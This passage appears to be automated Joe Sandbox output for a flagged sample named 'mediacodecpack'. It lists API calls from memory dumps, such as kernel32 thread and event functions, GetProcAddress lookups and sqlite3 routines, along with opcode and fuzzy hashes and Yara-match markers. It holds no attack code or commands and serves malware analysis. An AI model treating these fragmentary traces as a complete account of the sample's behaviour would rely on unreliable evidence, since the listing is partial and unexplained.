                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,5304F1C2), ref: 02D1078A
                                                                                • CloseHandle.KERNEL32(00000000), ref: 02D1079F
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseEventHandle$CreateOpenReset
                                                                                • String ID:
                                                                                • API String ID: 1285874450-0
                                                                                • Opcode ID: 2ec5ff4be6a77ab5b063508f30d9070a5f46893fd45647bf8dbc7585676d5003
                                                                                • Instruction ID: e8a71bfcc7bd5d12c6592095300c69851415c357affb9f162c89e854d2abcbd4
                                                                                • Opcode Fuzzy Hash: 2ec5ff4be6a77ab5b063508f30d9070a5f46893fd45647bf8dbc7585676d5003
                                                                                • Instruction Fuzzy Hash: 07414C70D04358ABDF21DBA4E848BAEB7B9BF05725F644219E818AB780D7309D45CFA0
                                                                                APIs
                                                                                • InterlockedExchange.KERNEL32(?,00000001), ref: 02D020AC
                                                                                • SetWaitableTimer.KERNEL32(00000000,?,00000001,00000000,00000000,00000000), ref: 02D020CD
                                                                                • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02D020D8
                                                                                • InterlockedDecrement.KERNEL32(?), ref: 02D0213E
                                                                                • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000001F4,?), ref: 02D0217A
                                                                                • InterlockedDecrement.KERNEL32(?), ref: 02D02187
                                                                                • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02D021A6
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Interlocked$Exchange$Decrement$CompletionQueuedStatusTimerWaitable
                                                                                • String ID:
                                                                                • API String ID: 1171374749-0
                                                                                • Opcode ID: 4528ce333cb5b8058c7f09c098832152bd25980a5191f509a9b7503c40df607b
                                                                                • Instruction ID: 2b0f21e46cfc1aabdb72d2df4f1ebc6a63ce24cc3e2f77dcc507ce3fde2b2ec2
                                                                                • Opcode Fuzzy Hash: 4528ce333cb5b8058c7f09c098832152bd25980a5191f509a9b7503c40df607b
                                                                                • Instruction Fuzzy Hash: 704108715047019FC325DF25D888E6BBBF9FBD8754F504A1EA896827A0D730E909CFA2
                                                                                APIs
                                                                                  • Part of subcall function 02D10EE0: OpenEventA.KERNEL32(00100002,00000000,?,?,?,02D1073E,?,?), ref: 02D10F0F
                                                                                  • Part of subcall function 02D10EE0: CloseHandle.KERNEL32(00000000,?,?,02D1073E,?,?), ref: 02D10F24
                                                                                  • Part of subcall function 02D10EE0: SetEvent.KERNEL32(00000000,02D1073E,?,?), ref: 02D10F37
                                                                                • OpenEventA.KERNEL32(00100002,00000000,00000000,5304F1C2), ref: 02D106C0
                                                                                • CloseHandle.KERNEL32(00000000), ref: 02D106D5
                                                                                • ResetEvent.KERNEL32(00000000,5304F1C2), ref: 02D106DF
                                                                                • CloseHandle.KERNEL32(00000000,5304F1C2), ref: 02D10714
                                                                                • __CxxThrowException@8.LIBCMT ref: 02D10745
                                                                                  • Part of subcall function 02D131CA: RaiseException.KERNEL32(?,?,02D0EB63,?,?,?,?,?,?,?,02D0EB63,?,02D2ECA8,?), ref: 02D1321F
                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,5304F1C2), ref: 02D1078A
                                                                                • CloseHandle.KERNEL32(00000000), ref: 02D1079F
                                                                                  • Part of subcall function 02D10C20: GetCurrentProcessId.KERNEL32(?), ref: 02D10C79
                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,5304F1C2), ref: 02D107AF
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Event$CloseHandle$Open$CreateCurrentExceptionException@8ObjectProcessRaiseResetSingleThrowWait
                                                                                • String ID:
                                                                                • API String ID: 2227236058-0
                                                                                • Opcode ID: e39c1cd6caf9495a29d5fdccaf440f9da89e2ef200f83bd2888a2633b19137cf
                                                                                • Instruction ID: abe68abe88105598ef7995c6798ffa845b66ecf7e10491ee85c9e915e0d66294
                                                                                • Opcode Fuzzy Hash: e39c1cd6caf9495a29d5fdccaf440f9da89e2ef200f83bd2888a2633b19137cf
                                                                                • Instruction Fuzzy Hash: CA314C71D00358BBDB21EBA4AC44BADB7B9AF05316F144129EC18EB780E7309D85CFA1
                                                                                APIs
                                                                                • sqlite3_blob_reopen.SQLITE3 ref: 60963510
                                                                                  • Part of subcall function 60962F28: sqlite3_log.SQLITE3 ref: 60962F5D
                                                                                • sqlite3_mprintf.SQLITE3 ref: 60963534
                                                                                • sqlite3_blob_open.SQLITE3 ref: 6096358B
                                                                                • sqlite3_blob_bytes.SQLITE3 ref: 609635A3
                                                                                • sqlite3_malloc.SQLITE3 ref: 609635BB
                                                                                • sqlite3_blob_read.SQLITE3 ref: 60963602
                                                                                • sqlite3_free.SQLITE3 ref: 60963621
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2576878006.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                • Associated: 00000003.00000002.2576857276.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577000284.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577020456.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577056487.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577082517.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577099335.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: sqlite3_blob_bytessqlite3_blob_opensqlite3_blob_readsqlite3_blob_reopensqlite3_freesqlite3_logsqlite3_mallocsqlite3_mprintf
                                                                                • String ID:
                                                                                • API String ID: 4276469440-0
                                                                                • Opcode ID: 81f80890dbec9a3991ff68d8cfcbb164f6b4d7f09a97d6cb6c54cb11191f3d09
                                                                                • Instruction ID: 177081cd506585250240414a33056f89eeda992db91a315aff795e5fc91eaf1e
                                                                                • Opcode Fuzzy Hash: 81f80890dbec9a3991ff68d8cfcbb164f6b4d7f09a97d6cb6c54cb11191f3d09
                                                                                • Instruction Fuzzy Hash: C641E5B09087059FDB40DF29C48179EBBE6AF98354F01C87AE898DB354E734D841DB92
                                                                                APIs
                                                                                • sqlite3_value_text.SQLITE3 ref: 6091A240
                                                                                • sqlite3_value_text.SQLITE3 ref: 6091A24E
                                                                                • sqlite3_value_bytes.SQLITE3 ref: 6091A25A
                                                                                • sqlite3_value_text.SQLITE3 ref: 6091A27C
                                                                                Strings
                                                                                • LIKE or GLOB pattern too complex, xrefs: 6091A267
                                                                                • ESCAPE expression must be a single character, xrefs: 6091A293
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2576878006.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                • Associated: 00000003.00000002.2576857276.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577000284.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577020456.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577056487.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577082517.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577099335.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: sqlite3_value_text$sqlite3_value_bytes
                                                                                • String ID: ESCAPE expression must be a single character$LIKE or GLOB pattern too complex
                                                                                • API String ID: 4080917175-264706735
                                                                                • Opcode ID: e5bda90e0e0ba1860c41bc069fb20e3a267b2c9271c0a370806f06164fd47fa4
                                                                                • Instruction ID: 7e7232241edcba55bc41816b79a09feadaac9d75cc2fb544db44a2248cbef301
                                                                                • Opcode Fuzzy Hash: e5bda90e0e0ba1860c41bc069fb20e3a267b2c9271c0a370806f06164fd47fa4
                                                                                • Instruction Fuzzy Hash: A4214C74A182198BCB00DF79C88165EBBF6FF64354B108AA9E864DB344E734DCC6CB95
                                                                                APIs
                                                                                  • Part of subcall function 6092506E: sqlite3_log.SQLITE3 ref: 609250AB
                                                                                • sqlite3_mutex_enter.SQLITE3 ref: 609250E7
                                                                                • sqlite3_value_text16.SQLITE3 ref: 60925100
                                                                                • sqlite3_value_text16.SQLITE3 ref: 6092512C
                                                                                • sqlite3_mutex_leave.SQLITE3 ref: 6092513E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2576878006.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                • Associated: 00000003.00000002.2576857276.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577000284.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577020456.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577056487.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577082517.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577099335.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: sqlite3_value_text16$sqlite3_logsqlite3_mutex_entersqlite3_mutex_leave
                                                                                • String ID: library routine called out of sequence$out of memory
                                                                                • API String ID: 2019783549-3029887290
                                                                                • Opcode ID: bf8b25fefa583efc99e02b0fe9019e927645d1a19242a42ec125398c6bed8d9e
                                                                                • Instruction ID: f6310061860eb79c45c0a7b6efb00bde58ba827c5a391e7df96a4cb3fbc4cfa9
                                                                                • Opcode Fuzzy Hash: bf8b25fefa583efc99e02b0fe9019e927645d1a19242a42ec125398c6bed8d9e
                                                                                • Instruction Fuzzy Hash: 81014C70A083049BDB14AF69C9C170EBBE6BF64248F0488A9EC958F30EE775D8818B51
                                                                                APIs
                                                                                • __init_pointers.LIBCMT ref: 02D14A04
                                                                                  • Part of subcall function 02D170C0: RtlEncodePointer.NTDLL(00000000), ref: 02D170C3
                                                                                  • Part of subcall function 02D170C0: __initp_misc_winsig.LIBCMT ref: 02D170DE
                                                                                  • Part of subcall function 02D170C0: GetModuleHandleW.KERNEL32(kernel32.dll,?,02D2F248,00000008,00000003,02D2EC8C,?,00000001), ref: 02D17E41
                                                                                  • Part of subcall function 02D170C0: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 02D17E55
                                                                                  • Part of subcall function 02D170C0: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 02D17E68
                                                                                  • Part of subcall function 02D170C0: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 02D17E7B
                                                                                  • Part of subcall function 02D170C0: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 02D17E8E
                                                                                  • Part of subcall function 02D170C0: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 02D17EA1
                                                                                  • Part of subcall function 02D170C0: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 02D17EB4
                                                                                  • Part of subcall function 02D170C0: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 02D17EC7
                                                                                  • Part of subcall function 02D170C0: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 02D17EDA
                                                                                  • Part of subcall function 02D170C0: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 02D17EED
                                                                                  • Part of subcall function 02D170C0: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 02D17F00
                                                                                  • Part of subcall function 02D170C0: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 02D17F13
                                                                                  • Part of subcall function 02D170C0: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 02D17F26
                                                                                  • Part of subcall function 02D170C0: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 02D17F39
                                                                                  • Part of subcall function 02D170C0: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 02D17F4C
                                                                                  • Part of subcall function 02D170C0: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 02D17F5F
                                                                                • __mtinitlocks.LIBCMT ref: 02D14A09
                                                                                • __mtterm.LIBCMT ref: 02D14A12
                                                                                  • Part of subcall function 02D14A7A: RtlDeleteCriticalSection.NTDLL(00000000), ref: 02D174F6
                                                                                  • Part of subcall function 02D14A7A: _free.LIBCMT ref: 02D174FD
                                                                                  • Part of subcall function 02D14A7A: RtlDeleteCriticalSection.NTDLL(02D31978), ref: 02D1751F
                                                                                • __calloc_crt.LIBCMT ref: 02D14A37
                                                                                • __initptd.LIBCMT ref: 02D14A59
                                                                                • GetCurrentThreadId.KERNEL32 ref: 02D14A60
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                                                • String ID:
                                                                                • API String ID: 3567560977-0
                                                                                • Opcode ID: ba9fa935f5a3a329a6446a28ed17fecfacda1a460c0462daee670e9d25697611
                                                                                • Instruction ID: 85802e1cfa4011ba38816181d227c8305ea541e5ab9386e2763ed3126e2946f4
                                                                                • Opcode Fuzzy Hash: ba9fa935f5a3a329a6446a28ed17fecfacda1a460c0462daee670e9d25697611
                                                                                • Instruction Fuzzy Hash: 1AF0CD3294C6123DF674BB78BC1176A2B92DF01738F224A19E025D9FE0FF11CC019964
                                                                                APIs
                                                                                • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,?,02D12483,00000000), ref: 02D124EB
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 02D124F2
                                                                                • RtlEncodePointer.NTDLL(00000000), ref: 02D124FE
                                                                                • RtlDecodePointer.NTDLL(00000001), ref: 02D1251B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                                • String ID: RoInitialize$combase.dll
                                                                                • API String ID: 3489934621-340411864
                                                                                • Opcode ID: c8b8b93b505bfdd5f2d5efd7afe971d688a81a6ef041812f50e796d44f9a51e9
                                                                                • Instruction ID: 38fa4480e158f72a35c187dea723b08fc201f8433bdbb65336a49036c6dbae40
                                                                                • Opcode Fuzzy Hash: c8b8b93b505bfdd5f2d5efd7afe971d688a81a6ef041812f50e796d44f9a51e9
                                                                                • Instruction Fuzzy Hash: 42E0ED71BD4310AAEB301BB4FC9DF143BA4A760746F614820B056D5384C7B98C6D8A10
                                                                                APIs
                                                                                • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,02D124C0), ref: 02D125C0
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 02D125C7
                                                                                • RtlEncodePointer.NTDLL(00000000), ref: 02D125D2
                                                                                • RtlDecodePointer.NTDLL(02D124C0), ref: 02D125ED
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                                • String ID: RoUninitialize$combase.dll
                                                                                • API String ID: 3489934621-2819208100
                                                                                • Opcode ID: 1168fccf76f121864a9ec6e431405878403dfbe09acbf745ba4c5edc221937f3
                                                                                • Instruction ID: 21fce354dbe8b4e373292d220e79cb13d44b0ae9ac2033b45e62b9a35fe0ee66
                                                                                • Opcode Fuzzy Hash: 1168fccf76f121864a9ec6e431405878403dfbe09acbf745ba4c5edc221937f3
                                                                                • Instruction Fuzzy Hash: 7FE09270AC0320ABEB295B60FD5DF143B68A714719F610824F506A6384DBBD9C688E50
                                                                                APIs
                                                                                • TlsGetValue.KERNEL32(0000002B,5304F1C2,?,?,?,?,00000000,02D240D8,000000FF,02D111DA), ref: 02D10F7A
                                                                                • TlsSetValue.KERNEL32(0000002B,02D111DA,?,?,00000000), ref: 02D10FE7
                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D11011
                                                                                • HeapFree.KERNEL32(00000000), ref: 02D11014
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: HeapValue$FreeProcess
                                                                                • String ID:
                                                                                • API String ID: 1812714009-0
                                                                                • Opcode ID: d66a9103e38be0e0c899919f2613304427f2a93aed9f61f9dd3763b52af6d0e3
                                                                                • Instruction ID: 756a0a2944f025bdbb1b2f85c8672ad2db3cd1c0ece63b0380458e5588457f51
                                                                                • Opcode Fuzzy Hash: d66a9103e38be0e0c899919f2613304427f2a93aed9f61f9dd3763b52af6d0e3
                                                                                • Instruction Fuzzy Hash: 3651DF31A04384AFDB20DF28E944B16BBE4EB45764F298659FA5DAB780D731EC04CB91
                                                                                APIs
                                                                                • _ValidateScopeTableHandlers.LIBCMT ref: 02D22DB0
                                                                                • __FindPESection.LIBCMT ref: 02D22DCA
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FindHandlersScopeSectionTableValidate
                                                                                • String ID:
                                                                                • API String ID: 876702719-0
                                                                                • Opcode ID: 2e4b5b7005f0ca298f0d8ec41f5d127aa23224bc635db225fd6074eed29267c6
                                                                                • Instruction ID: cf4f589c4c5c1c7342864c76f2deb2ce1c37603b184d6fcd898894c3b4a54c13
                                                                                • Opcode Fuzzy Hash: 2e4b5b7005f0ca298f0d8ec41f5d127aa23224bc635db225fd6074eed29267c6
                                                                                • Instruction Fuzzy Hash: C6A1B171A002258FCB15CF18DC88BADB7A5FB58328F584669FC15A7391E731EC49CB90
                                                                                APIs
                                                                                • GetStringTypeW.KERNEL32(00000001,00408640,00000001,00000000,00000103,00000001,00000000,00405E87,00200020,00000000,?,00000000,00000000,00000001), ref: 004062BD
                                                                                • GetStringTypeA.KERNEL32(00000000,00000001,0040863C,00000001,?,?,00000000,00000000,00000001), ref: 004062D7
                                                                                • GetStringTypeA.KERNEL32(00000000,00000000,?,00000000,00200020,00000103,00000001,00000000,00405E87,00200020,00000000,?,00000000,00000000,00000001), ref: 0040630B
                                                                                • MultiByteToWideChar.KERNEL32(00405E87,00000002,?,00000000,00000000,00000000,00000103,00000001,00000000,00405E87,00200020,00000000,?,00000000,00000000,00000001), ref: 00406343
                                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00406399
                                                                                • GetStringTypeW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004063AB
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2567390961.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.2567390961.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: StringType$ByteCharMultiWide
                                                                                • String ID:
                                                                                • API String ID: 3852931651-0
                                                                                • Opcode ID: d203232162232c56530dc1c9e7ac7d7ca2f1092592616d16a6b156e600e46040
                                                                                • Instruction ID: 1973b5c1488275f86b32e201772009c48c68fd6130b56f6c31499d13724d529d
                                                                                • Opcode Fuzzy Hash: d203232162232c56530dc1c9e7ac7d7ca2f1092592616d16a6b156e600e46040
                                                                                • Instruction Fuzzy Hash: 97418E72500219EFDF119F94DE86AAF3F78EB04350F11453AFA52F6290C73989608BE8
                                                                                APIs
                                                                                • sqlite3_free.SQLITE3(?), ref: 609476DD
                                                                                  • Part of subcall function 60904423: sqlite3_mutex_leave.SQLITE3(6090449D,?,?,?,60908270), ref: 60904446
                                                                                • sqlite3_log.SQLITE3 ref: 609498F5
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2576878006.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                • Associated: 00000003.00000002.2576857276.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577000284.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577020456.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577056487.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577082517.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577099335.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: sqlite3_freesqlite3_logsqlite3_mutex_leave
                                                                                • String ID: List of tree roots: $d$|
                                                                                • API String ID: 3709608969-1164703836
                                                                                • Opcode ID: 316fa83f4dc1e403b3b617744d66ff6f9af545e53e2752a9ff9486d467efffaf
                                                                                • Instruction ID: c91562837ba2d96ae21b52ab8334c840e7cbe23d8154f1acff92b465618a0bd4
                                                                                • Opcode Fuzzy Hash: 316fa83f4dc1e403b3b617744d66ff6f9af545e53e2752a9ff9486d467efffaf
                                                                                • Instruction Fuzzy Hash: 3FE10570A043698BDB22CF18C88179DFBBABF65304F1185D9E858AB251D775DE81CF81
                                                                                APIs
                                                                                • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 02D01CB1
                                                                                • CloseHandle.KERNEL32(?), ref: 02D01CBA
                                                                                • InterlockedExchangeAdd.KERNEL32(02D35264,00000000), ref: 02D01CC6
                                                                                • TerminateThread.KERNEL32(?,00000000), ref: 02D01CD4
                                                                                • QueueUserAPC.KERNEL32(02D01E7C,?,00000000), ref: 02D01CE1
                                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 02D01CEC
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Wait$CloseExchangeHandleInterlockedMultipleObjectObjectsQueueSingleTerminateThreadUser
                                                                                • String ID:
                                                                                • API String ID: 1946104331-0
                                                                                • Opcode ID: 34d8e1871bf3c06bc50877b3fe5d7e5fca0dd9f0f380fc2bedbdbdc66174f49c
                                                                                • Instruction ID: a61d0214b75bf605333785e2c5384e961673b973405082f0f56c443da624335f
                                                                                • Opcode Fuzzy Hash: 34d8e1871bf3c06bc50877b3fe5d7e5fca0dd9f0f380fc2bedbdbdc66174f49c
                                                                                • Instruction Fuzzy Hash: A9F08135944200AFD7245B96ED09E5BBBBCEB45B217514619F56A82290DB709C14CBA0
                                                                                APIs
                                                                                  • Part of subcall function 6095FFB2: sqlite3_bind_int64.SQLITE3 ref: 6095FFFA
                                                                                  • Part of subcall function 6095FFB2: sqlite3_step.SQLITE3 ref: 60960009
                                                                                  • Part of subcall function 6095FFB2: sqlite3_reset.SQLITE3 ref: 60960019
                                                                                  • Part of subcall function 6095FFB2: sqlite3_result_error_code.SQLITE3 ref: 60960043
                                                                                • sqlite3_column_int64.SQLITE3 ref: 609600BA
                                                                                • sqlite3_column_text.SQLITE3 ref: 609600EF
                                                                                • sqlite3_free.SQLITE3 ref: 6096029A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2576878006.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                • Associated: 00000003.00000002.2576857276.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577000284.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577020456.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577056487.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577082517.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577099335.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: sqlite3_bind_int64sqlite3_column_int64sqlite3_column_textsqlite3_freesqlite3_resetsqlite3_result_error_codesqlite3_step
                                                                                • String ID: e
                                                                                • API String ID: 786425071-4024072794
                                                                                • Opcode ID: 373422d03c3c71c2ddc35291c61dfb2213fd8f263c0b9a30c36f02d650250dc2
                                                                                • Instruction ID: e80500568aa73e744b5c90812a7938b6c4ac38b40afb48beb036dafaf3e7d002
                                                                                • Opcode Fuzzy Hash: 373422d03c3c71c2ddc35291c61dfb2213fd8f263c0b9a30c36f02d650250dc2
                                                                                • Instruction Fuzzy Hash: 6291E270A18609CFDB04CF99C494B9EBBF2BF98314F108529E869AB354D774E885CF91
                                                                                APIs
                                                                                • GetVersionExA.KERNEL32 ref: 00403A3B
                                                                                • GetEnvironmentVariableA.KERNEL32(__MSVCRT_HEAP_SELECT,?,00001090), ref: 00403A70
                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00403AD0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2567390961.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.2567390961.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: EnvironmentFileModuleNameVariableVersion
                                                                                • String ID: __GLOBAL_HEAP_SELECTED$__MSVCRT_HEAP_SELECT
                                                                                • API String ID: 1385375860-4131005785
                                                                                • Opcode ID: 0f37da7df256ea2bf10cd5595ffbc211f3aae08b662fce8f1d53329a7b1a0cb3
                                                                                • Instruction ID: 8e0d8efe135bd9bd4ab90b631ae35de0fa5087430b450c3f58eab12f6465c816
                                                                                • Opcode Fuzzy Hash: 0f37da7df256ea2bf10cd5595ffbc211f3aae08b662fce8f1d53329a7b1a0cb3
                                                                                • Instruction Fuzzy Hash: BD3102319012886DEB319A745C46B9B7F6C9B02309F2404FBE185F52C3E6389F89CB1D
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2576878006.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
